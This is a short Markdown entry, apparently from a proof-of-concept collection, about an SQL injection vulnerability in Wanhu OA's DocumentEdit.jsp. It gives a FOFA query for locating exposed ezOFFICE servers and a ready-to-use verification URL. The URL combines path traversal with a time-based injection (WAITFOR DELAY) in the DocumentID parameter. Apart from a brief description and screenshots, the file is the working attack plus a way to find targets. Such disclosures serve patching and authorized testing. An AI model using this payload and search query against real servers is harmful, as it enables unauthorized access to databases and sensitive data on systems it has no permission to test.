Awesome-POC/OA产品漏洞/万户OA DocumentEdit.jsp SQL注入漏洞.md
2022-12-05 11:09:28 +08:00

33 lines
644 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 万户OA DocumentEdit.jsp SQL注入漏洞
## 漏洞描述
万户OA DocumentEdit.jsp文件存在SQL注入漏洞攻击者通过发送特殊的请求包可以对数据库进行SQL注入获取服务器敏感信息
## 漏洞影响
```
万户OA
```
## FOFA
```
app="万户网络-ezOFFICE"
```
## 漏洞复现
产品页面
![1](./images/202209131047757.png)
验证POC
```
/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1';WAITFOR%20DELAY%20'0:0:5'--
```
![1662358602569-71e26a34-726b-4d75-b683-225884ec7b4a](./images/202209131047397.png)
![3](./images/202209131047713.png)